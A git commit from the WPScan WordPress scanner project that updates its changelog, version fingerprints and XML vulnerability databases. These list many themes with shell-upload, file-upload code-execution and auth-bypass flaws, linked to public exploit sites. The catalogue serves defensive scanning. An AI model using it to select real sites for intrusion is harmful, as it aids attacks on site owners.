Fix git merge problem

Peter
2014-04-27 15:32:10 +02:00
32 changed files with 3981 additions and 546 deletions

View File

@@ -4,7 +4,8 @@ rvm:
- 1.9.3
- 2.0.0
- 2.1.0
- 2.1.1
script: bundle exec rspec --format documentation
notifications:
email:
- wpscanteam@gmail.com
- wpscanteam@gmail.com

View File

@@ -1,6 +1,61 @@
# Changelog
## Master
[Work in progress](https://github.com/wpscanteam/wpscan/compare/2.3...master)
[Work in progress](https://github.com/wpscanteam/wpscan/compare/2.4...master)
## Version 2.4
Released: 2014-04-17
New
* '--batch' switch option added - Fix #454
* Add random-agent
* Added more CLI options
* Switch over to nist - Fix #301
* New choice added when a redirection is detected - Fix #438
Removed
* Removed 'Total WordPress Sites in the World' counter from stats
* Old wpscan repo links removed - Fix #440
* Fingerprinting Dev script removed
* Useless code removed
General core
* Rspecs update
* Forcing Travis notify the team
* Ruby 2.1.1 added to Travis
* Equal output layout for interaction questions
* Only output error trace if verbose if enabled
* Memory improvements during wp-items enumerations
* Fixed broken link checker, fixed some broken links
* Couple more 404s fixed
* Themes & Plugins list updated
WordPress Fingerprints
* WP 3.8.2 & 3.7.2 Fingerprints added - Fix #448
* WP 3.8.3 & 3.7.3 fingerprints
* WP 3.9 fingerprints
Fixed issues
* Fix #380 - Redirects in WP 3.6-3.0
* Fix #413 - Check the version of the Timthumbs files found
* Fix #429 - Error WpScan Cache Browser
* Fix #431 - Version number comparison between '2.3.3' and '0.42b'
* Fix #439 - Detect if the target goes down during the scan
* Fix #451 - Do not rely only on files in wp-content for fingerprinting
* Fix #453 - Documentation or inplemention of option parameters
* Fix #455 - Fails with a message if the target returns a 403 during the wordpress check
Vulnerabilities
* Update WordPress Vulnerabilities
* Fixed some duplicate vulnerabilities
WPScan Database Statistics:
* Total vulnerable versions: 79; 1 is new
* Total vulnerable plugins: 748; 55 are new
* Total vulnerable themes: 292; 41 are new
* Total version vulnerabilities: 617; 326 are new
* Total plugin vulnerabilities: 1162; 146 are new
* Total theme vulnerabilities: 330; 47 are new
## Version 2.3
Released: 2014-02-11
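Review bot: Three of the entries added under Version 2.4 have wording errors: "Only output error trace if verbose if enabled" should read "if verbose is enabled", "Documentation or inplemention of option parameters" should read "implementation", and "Forcing Travis notify the team" is missing "to". Please fix them in this file before the 2.4 notes are referenced elsewhere.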
@@ -12,7 +67,7 @@ New
* New spell checker!
* Added database modification dates in status report
* Added 'Total WordPress Sites in the World' statistics
* Added separator between Name and Version in Item
* Added separator between Name and Version in Item
* Added a "Work in progress" URL in the CHANGELOG
Removed
@@ -44,7 +99,7 @@ WPScan Database Statistics:
* Total plugin vulnerabilities: 1016; 236 are new
* Total theme vulnerabilities: 283; 79 are new
Add WP Fingerprints
WordPress Fingerprints
* Better fingerprints
* WP 3.8.1 Fingerprinting
* WP 3.8 Fingerprinting
@@ -53,10 +108,10 @@ Fixed issues
* Fix #404 - Brute forcing issue over https
* Fix #398 - Removed a fake vuln in WP Super Cache
* Fix #393 - sudo added to the bundle install cmd for Mac OSX
* Fix #228, #327 - Infinite loop when self-redirect
* Fix #228, #327 - Infinite loop when self-redirect
* Fix #201 - Incorrect Paramter Parsing when no url was supplied
## Version 2.2
## Version 2.2
Released: 2013-11-12
New

README
View File

@@ -82,7 +82,6 @@ ryandewhurst at gmail
- Typhoeus segmentation fault:
Update cURL to version => 7.21 (may have to install from source)
See http://code.google.com/p/wpscan/issues/detail?id=81
- Proxy not working:
Update cURL to version => 7.21.7 (may have to install from source).

View File

@@ -90,7 +90,6 @@ Apple Xcode, Command Line Tools and the libffi are needed (to be able to install
- Typhoeus segmentation fault
Update cURL to version => 7.21 (may have to install from source)
See http://code.google.com/p/wpscan/issues/detail?id=81
- Proxy not working

File diff suppressed because it is too large

File diff suppressed because it is too large

File diff suppressed because it is too large

View File

@@ -93,6 +93,13 @@
</references>
<type>UPLOAD</type>
</vulnerability>
<vulnerability>
<title>vithy - Custom Background Shell Upload</title>
<references>
<url>http://packetstormsecurity.com/files/125827/</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="appius">
@@ -110,6 +117,13 @@
</references>
<type>UPLOAD</type>
</vulnerability>
<vulnerability>
<title>appius - Custom Background Shell Upload</title>
<references>
<url>http://packetstormsecurity.com/files/125827/</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="yvora">
@@ -144,6 +158,13 @@
</references>
<type>UPLOAD</type>
</vulnerability>
<vulnerability>
<title>Shotzz - Custom Background Shell Upload</title>
<references>
<url>http://packetstormsecurity.com/files/125827/</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="dagda">
@@ -154,6 +175,13 @@
</references>
<type>UPLOAD</type>
</vulnerability>
<vulnerability>
<title>dagda - Custom Background Shell Upload</title>
<references>
<url>http://packetstormsecurity.com/files/125827/</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="moneymasters">
@@ -534,6 +562,7 @@
<url>http://packetstormsecurity.org/files/114750/</url>
</references>
<type>UNKNOWN</type>
<fixed_in>2.0</fixed_in>
</vulnerability>
</theme>
@@ -584,6 +613,7 @@
<url>http://packetstormsecurity.org/files/114750/</url>
</references>
<type>UNKNOWN</type>
<fixed_in>2.0</fixed_in>
</vulnerability>
</theme>
@@ -594,6 +624,7 @@
<url>http://packetstormsecurity.org/files/114750/</url>
</references>
<type>UNKNOWN</type>
<fixed_in>2.0</fixed_in>
</vulnerability>
</theme>
@@ -614,6 +645,7 @@
<url>http://packetstormsecurity.org/files/114750/</url>
</references>
<type>UNKNOWN</type>
<fixed_in>2.0</fixed_in>
</vulnerability>
</theme>
@@ -624,6 +656,7 @@
<url>http://packetstormsecurity.org/files/114750/</url>
</references>
<type>UNKNOWN</type>
<fixed_in>2.0</fixed_in>
</vulnerability>
</theme>
@@ -634,6 +667,7 @@
<url>http://packetstormsecurity.org/files/114750/</url>
</references>
<type>UNKNOWN</type>
<fixed_in>2.0</fixed_in>
</vulnerability>
</theme>
@@ -1811,12 +1845,20 @@
<theme name="archin">
<vulnerability>
<title>Archin - Cross-Site Scripting and Arbitrary File Upload Vulnerabilities</title>
<title>Archin 3.2 - Cross-Site Scripting and Arbitrary File Upload Vulnerabilities</title>
<references>
<secunia>50711</secunia>
</references>
<type>MULTI</type>
</vulnerability>
<vulnerability>
<title>Archin 3.2 - hades_framework/option_panel/ajax.php Configuration Option Manipulation</title>
<references>
<osvdb>86991</osvdb>
<exploitdb>21646</exploitdb>
</references>
<type>RCE</type>
</vulnerability>
</theme>
<theme name="purity">
@@ -1899,6 +1941,13 @@
</references>
<type>XSS</type>
</vulnerability>
<vulnerability>
<title>felici - Custom Background Shell Upload</title>
<references>
<url>http://packetstormsecurity.com/files/125830/</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="classic">
@@ -1947,7 +1996,7 @@
<vulnerability>
<title>Xss In wordpress ambience theme</title>
<references>
<url>http://packetstorm.igor.onlinedirect.bg/1306-exploits/wpambience-xss.txt</url>
<url>http://www.websecuritywatch.com/wordpress-ambience-xss/</url>
</references>
<type>XSS</type>
</vulnerability>
@@ -2564,7 +2613,7 @@
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="OptimizePress">
<vulnerability>
<title>OptimizePress - File Upload Vulnerability</title>
@@ -2580,7 +2629,7 @@
</vulnerability>
</theme>
<theme name="Blooog-v1.1">
<theme name="blooog">
<vulnerability>
<title>Blooog 1.1 - jplayer.swf Cross Site Scripting</title>
<references>
@@ -3023,4 +3072,459 @@
</vulnerability>
</theme>
<theme name="Realestate">
<vulnerability>
<title>Real Estate - Templatic Theme CSRF File Upload Vulnerability</title>
<references>
<url>http://1337day.com/exploit/22091</url>
</references>
<type>CSRF</type>
</vulnerability>
</theme>
<theme name="dailydeal">
<vulnerability>
<title>Dailydeal - Templatic Theme CSRF File Upload Vulnerability</title>
<references>
<url>http://1337day.com/exploit/22091</url>
</references>
<type>CSRF</type>
</vulnerability>
</theme>
<theme name="nightlife">
<vulnerability>
<title>Nightlife - Templatic Theme CSRF File Upload Vulnerability</title>
<references>
<url>http://1337day.com/exploit/22091</url>
</references>
<type>CSRF</type>
</vulnerability>
</theme>
<theme name="5star">
<vulnerability>
<title>5star - Templatic Theme CSRF File Upload Vulnerability</title>
<references>
<url>http://1337day.com/exploit/22091</url>
</references>
<type>CSRF</type>
</vulnerability>
</theme>
<theme name="specialist">
<vulnerability>
<title>Specialist - Templatic Theme CSRF File Upload Vulnerability</title>
<references>
<url>http://1337day.com/exploit/22091</url>
</references>
<type>CSRF</type>
</vulnerability>
</theme>
<theme name="flatshop">
<vulnerability>
<title>Flatshop - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="magazine">
<vulnerability>
<title>Magazine - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="parallax">
<vulnerability>
<title>Parallax - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="bold">
<vulnerability>
<title>Bold - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="metro">
<vulnerability>
<title>Metro - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="pinshop">
<vulnerability>
<title>Pinshop - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="agency">
<vulnerability>
<title>Agency - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="slide">
<vulnerability>
<title>Slide - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="postline">
<vulnerability>
<title>Postline - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="fullscreen">
<vulnerability>
<title>Fulscreen - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="shopo">
<vulnerability>
<title>Shopo - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="minshop">
<vulnerability>
<title>Minshop - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="notes">
<vulnerability>
<title>Notes - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="shopdock">
<vulnerability>
<title>Shopdock - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="phototouch">
<vulnerability>
<title>Phototouch - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="basic">
<vulnerability>
<title>Basic - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="responz">
<vulnerability>
<title>Responz - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="simfo">
<vulnerability>
<title>Simfo - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="grido">
<vulnerability>
<title>Grido - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="tisa">
<vulnerability>
<title>Tisa - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="funki">
<vulnerability>
<title>Funki - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="minblr">
<vulnerability>
<title>Minblr - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="newsy">
<vulnerability>
<title>Newsy - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="wumblr">
<vulnerability>
<title>Wumblr - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="rezo">
<vulnerability>
<title>Rezo - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="photobox">
<vulnerability>
<title>Photobox - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="edmin">
<vulnerability>
<title>Edmin - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="koi">
<vulnerability>
<title>Koi - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="bizco">
<vulnerability>
<title>Bizco - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="thememin">
<vulnerability>
<title>Thememin - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="wigi">
<vulnerability>
<title>Wigi - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="sidepane">
<vulnerability>
<title>Sidepane - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="Sixtees">
<vulnerability>
<title>Sixtees - Shell Upload</title>
<references>
<url>http://packetstormsecurity.com/files/125491/</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="linenity">
<vulnerability>
<title>LineNity 1.20 - download.php imgurl Parameter Remote Path Traversal File Access</title>
<references>
<osvdb>105767</osvdb>
<exploitdb>32861</exploitdb>
</references>
<type>LFI</type>
</vulnerability>
</theme>
</vulnerabilities>
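Review bot: In the block of new themes at the end of this file, the `name` attributes `Realestate` and `Sixtees` are capitalised, while every other theme added here is lowercase and the earlier hunk renames `Blooog-v1.1` to `blooog`. If `name` is compared against the theme directory found on the target, these two entries will only match that exact casing, so please confirm the slugs or lowercase them. Separately, the title under `<theme name="fullscreen">` is misspelled as "Fulscreen".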

View File

@@ -1,27 +1,28 @@
academica
activetab
aadya
abaris
adamos
adaptive-flat
adelle
admired
adventure
advertica-lite
albinomouse
aldehyde
alexandria
analytical-lite
anarcho-notepad
andrina-lite
appointment
aquarius
ascetica
apprise
arcade-basic
arunachala
aspen
asteria-lite
asteroid
atahualpa
attitude
autofocus
base-wp
beach
bearded
bicubic
birdsite
big-city
bizantine
bizark
bizflare
@@ -31,270 +32,267 @@ bizsphere
bizstudio-lite
bizway
blackbird
blain
blankslate
blogbox
blogly-lite
blogolife
blogotron
blox
blue-planet
bluegray
boldr-lite
boot-store
bootstrap-ultimate
bota
bouquet
bresponzive
brightnews
bueno
bushwick
business-lite
busiprof
butterbelly
buzz
byblos
carton
capture
catch-box
catch-everest
catch-evolution
catch-kathmandu
celestial-lite
chaostheory
childishly-simple
chooko-lite
church
cirrus
clean-retina
cleo
coller
colorway
contango
coraline
corpo
crates
current
custom-community
customizr
cyberchimps
d5-socialia
dark-tt
dazzling
decode
designfolio
desk-mess-mirrored
destro
discover
dms
drop
duena
dusk-to-dawn
duster
dw-minion
dw-timeline
dw-wallpress
dzonia-lite
eclipse
elisium
elegantwhite
elmax
engrave-lite
enough
envision
epic
esell
esplanade
esquire
estate
evolve
expert
expound
family
fashionistas
fastr
figero
fifteen
fine
firmasite
fixy
flounder
flat
focus
forestly
forever
formidable-restaurant
frau
formation
fresh-lite
frisco-for-buddypress
frontier
fruitful
future
gamepress
gold
golden-eagle-lite
govpress
graphene
graphy
gridbulletin
gridiculous
gridster-lite
hatch
hazen
hero
health-center-lite
hemingway
highwind
hueman
hypnotist
i-transform
iconic-one
ifeature
imprint
independent-publisher
infinite
infoway
inkness
inkzine
intuition
invert-lite
irex-lite
iribbon
isis
journalism
itek
justwrite
kavya
klasik
leatherdiary
leniy-radius
limelight
lizardbusiness
local-business
lugada
magazine-basic
lingonberry
linia-magazine
luminescence-lite
lupercalia
magazine-style
magazino
mantra
market
match
matheson
max-magazine
maxflat-core
meadowhill
medicine
mesocolumn
mh-magazine-lite
ming
midnightcity
minimatica
minimize
mn-flow
modern-estate
monaco
montezuma
multiloquent
mywiki
neuro
neutro
newdark
newlife
newp
newtek
newgamer
newpro
next-saturday
nictitate
omega
one-page
onecolumn
onetone
openstrap
opulus-sombre
origami
origin
oxygen
p2
padhang
pagelines
parabola
parallax
parament
phonix
photolistic
piedmont
pilcrow
pilot-fish
pinbin
pinboard
pink-touch-2
pitch
platform
point
portfolio-press
pr-pin
pr-news
preference-lite
preus
primo-lite
privatebusiness
promax
quark
radiant
radiate
raindrops
rambo
raptor
raven
ready-review
reddle
redify
reizend
response
redesign
responsive
restaurante
restaurateur
restimpo
retention
reviewgine-affiliate
ridizain
rtpanel
rundown
sampression-lite
semper-fi-lite
sensitive
sequel
serene
shopping
sigma
silverclean-lite
simple-catch
simpleo
simplicity-lite
simply-vision
singl
sixteen
skt-full-width
sliding-door
smpl-skeleton
snaps
snapshot
sorbet
sneak-lite
socialize-lite
spacious
spartan
spasalon
sporty
spun
stairway
stargazer
startupwp
start-point
steira
strapvert
storefront-paper
story
suevafree
suffusion
sugar-and-spice
suits
sukelius-magazine
sundance
sunny-blue-sky
sunrain
sunspot
superhero
supernova
surfarama
swift-basic
syntax
tanzanite
teal
techism
tempera
temptation
terrifico
the-falcon
the-newswire
thematic
themia-lite
theron-lite
tiga
timeturner
tiny-forge
tonal
tonic
travel-blogger
travel-lite
travelify
twentyeleven
twentyfourteen
twentyten
twentythirteen
twentytwelve
typal-makewp005
unite
untitled
uu-2014
vantage
venom
viper
virtue
voyage
vision
visitpress
visual
vryn-restaurant
ward
weaver-ii
weavr
wiziapp-smooth-touch
wordplus
wp-advocate
wp-barrister
wilson
wp-creativix
wp-opulus
wp-simple
wpchimp-countdown
writr
x2
yoko
zalive
zbench
zeebizzcard
zeebusiness
zeedynamic
zeeflow
zeefocus
zeeminty
zeenoble
zeestyle
zeesynergie
zeetasty
zenon-lite

File diff suppressed because it is too large

View File

@@ -115,6 +115,7 @@ $wp-plugins$/islidex/js/timthumb.php
$wp-plugins$/islidex/js/timthumb.phpthumb.php
$wp-plugins$/islidex/js/timthumb.phptimthumb.php
$wp-plugins$/jquery-slider-for-featured-content/scripts/timthumb.php
$wp-plugins$/js-multihotel/includes/timthumb.php
$wp-plugins$/kc-related-posts-by-category/timthumb.php
$wp-plugins$/kino-gallery/timthumb.php
$wp-plugins$/lisl-last-image-slider/timthumb.php

View File

@@ -40,6 +40,7 @@
<xs:enumeration value="CSRF"/>
<xs:enumeration value="SSRF"/>
<xs:enumeration value="AUTHBYPASS"/>
<xs:enumeration value="BYPASS"/>
<xs:enumeration value="FPD"/>
<xs:enumeration value="XXE"/>
</xs:restriction>
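Review bot: The new `BYPASS` enumeration value sits directly beside the existing `AUTHBYPASS` with nothing in the schema saying when each applies. Please add an `xs:annotation` or an XML comment describing the intended distinction, so that new vulnerability entries are classified consistently.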

View File

@@ -10,16 +10,68 @@
<wp-versions xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="wp_versions.xsd">
<file src="wp-includes/css/buttons-rtl.css">
<hash md5="fb062ed92b76638c161e80f4a5426586">
<file src="readme.html">
<hash md5="84b54c54aa48ae72e633685c17e67457">
<version>3.9</version>
</hash>
<hash md5="c6de8fc70a18be7e5c36198cd0f99a64">
<version>3.8.3</version>
</hash>
<hash md5="e01a2663475f6a7a8363a7c75a73fe23">
<version>3.8.2</version>
</hash>
<hash md5="0d0eb101038124a108f608d419387b92">
<version>3.8.1</version>
</hash>
<hash md5="38ee273095b8f25b9ffd5ce5018fc4f0">
<version>3.8</version>
</hash>
<hash md5="813e06052daa0692036e60d76d7141d3">
<version>3.7.3</version>
</hash>
<hash md5="b3a05c7a344c2f53cb6b680fd65a91e8">
<version>3.7.2</version>
</hash>
<hash md5="e82f4fe7d3c1166afb4c00856b875f16">
<version>3.6.1</version>
</hash>
<hash md5="477f1e652f31dae76a38e3559c91deb9">
<version>3.6</version>
</hash>
<hash md5="caf7946275c3e885419b1d36b22cb5f3">
<version>3.5.2</version>
</hash>
<hash md5="05d50a04ef19bd4b0a280362469bf22f">
<version>3.5.1</version>
</hash>
<hash md5="066cfc0f9b29ae6d491aa342ebfb1b71">
<version>3.5</version>
</hash>
<hash md5="36b2b72a0f22138a921a38db890d18c1">
<version>3.3.3</version>
</hash>
<hash md5="628419c327ca5ed8685ae3af6f753eb8">
<version>3.3.2</version>
</hash>
<hash md5="c1ed266e26a829b772362d5135966bc3">
<version>3.3.1</version>
</hash>
<hash md5="9ea06ab0184049bf4ea2410bf51ce402">
<version>3.0</version>
</hash>
</file>
<file src="wp-includes/css/buttons-rtl.css">
<hash md5="d24d1d1eb3a4b9a4998e4df1761f8b9e">
<version>3.9</version>
</hash>
<hash md5="71c13ab1693b45fb3d7712e540c4dfe0">
<version>3.8</version>
</hash>
</file>
<file src="wp-includes/js/tinymce/wp-tinymce.js.gz">
<!-- Note: 3.7.1 has no unique file (the hash below is the same than the 3.7.2) -->
<hash md5="44d281b0d84cc494e2b095a6d2202f4d">
<version>3.7.1</version>
</hash>
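Review bot: The new `readme.html` hash list goes from 3.7.2 straight to 3.6.1, from 3.5 to 3.3.3, and from 3.3.1 to 3.0, with no comment saying whether the missing releases share a hash with a neighbour or were simply not collected. The `wp-tinymce.js.gz` block right below documents this for 3.7.1; a similar comment here would tell the next maintainer which gaps are intentional.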
@@ -64,13 +116,6 @@
</hash>
</file>
<file src="$wp-content$/themes/twentyeleven/style.css">
<!-- same md5 for 3.3.2 -->
<hash md5="030d3bac906ba69e9fbc99c5bac54a8e">
<version>3.3.1</version>
</hash>
</file>
<file src="wp-admin/js/common.js">
<hash md5="4516252d47a73630280869994d510180">
<version>3.3</version>

View File

@@ -3,6 +3,46 @@
<vulnerabilities xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="vuln.xsd">
<wordpress version="3.8.1">
<vulnerability>
<title>Administrator-exploitable blind SQLi in WordPress 1.0 - 3.8.1</title>
<references>
<url>https://security.dxw.com/advisories/sqli-in-wordpress-3-6-1/</url>
</references>
<type>SQLI</type>
</vulnerability>
<vulnerability>
<title>Potential Authentication Cookie Forgery</title>
<references>
<osvdb>105620</osvdb>
<url>https://labs.mwrinfosecurity.com/blog/2014/04/11/wordpress-auth-cookie-forgery/</url>
<url>https://github.com/WordPress/WordPress/commit/78a915e0e5927cf413aa6c2cef2fca3dc587f8be</url>
<cve>2014-0166</cve>
</references>
<type>AUTHBYPASS</type>
<fixed_in>3.8.2</fixed_in>
</vulnerability>
<vulnerability>
<title>Privilege escalation: contributors publishing posts</title>
<references>
<osvdb>105630</osvdb>
<url>https://github.com/wpscanteam/wpscan/wiki/CVE-2014-0165</url>
<cve>2014-0165</cve>
</references>
<type>BYPASS</type>
<fixed_in>3.8.2</fixed_in>
</vulnerability>
<vulnerability>
<title>Plupload Unspecified XSS</title>
<references>
<osvdb>105622</osvdb>
<secunia>57769</secunia>
</references>
<type>BYPASS</type>
<fixed_in>3.8.2</fixed_in>
</vulnerability>
</wordpress>
<wordpress version="3.8">
<vulnerability>
<title>wp-admin/options-writing.php Cleartext Admin Credentials Disclosure</title>
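Review bot: The "Plupload Unspecified XSS" entry added for 3.8.1 is typed `<type>BYPASS</type>`, although its title says XSS and the other entries with that title in this file use `<type>XSS</type>`. It looks like the type was carried over from the privilege escalation entry above it; suggest `XSS`. The SQLi entry in the same block is also the only one of the four without a `<fixed_in>`; if a fixed release exists, please add it.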
@@ -15,6 +55,26 @@
</wordpress>
<wordpress version="3.7.1">
<vulnerability>
<title>Potential Authentication Cookie Forgery</title>
<references>
<osvdb>105620</osvdb>
<url>https://github.com/WordPress/WordPress/commit/78a915e0e5927cf413aa6c2cef2fca3dc587f8be</url>
<cve>2014-0166</cve>
</references>
<type>AUTHBYPASS</type>
<fixed_in>3.7.2</fixed_in>
</vulnerability>
<vulnerability>
<title>Privilege escalation: contributors publishing posts</title>
<references>
<osvdb>105630</osvdb>
<url>https://github.com/wpscanteam/wpscan/wiki/CVE-2014-0165</url>
<cve>2014-0165</cve>
</references>
<type>BYPASS</type>
<fixed_in>3.7.2</fixed_in>
</vulnerability>
<vulnerability>
<title>wp-admin/options-writing.php Cleartext Admin Credentials Disclosure</title>
<references>
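Review bot: The "Potential Authentication Cookie Forgery" entry added for 3.7.1 references only the WordPress commit URL, while the 3.8.1 entry for the same CVE-2014-0166 also lists the labs.mwrinfosecurity.com write-up. Please keep the reference lists identical across versions, so the reported references do not depend on which version was detected.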
@@ -23,6 +83,15 @@
</references>
<type>AUTHBYPASS</type>
</vulnerability>
<vulnerability>
<title>Plupload Unspecified XSS</title>
<references>
<osvdb>105622</osvdb>
<secunia>57769</secunia>
</references>
<type>BYPASS</type>
<fixed_in>3.7.2</fixed_in>
</vulnerability>
</wordpress>
<wordpress version="3.6">
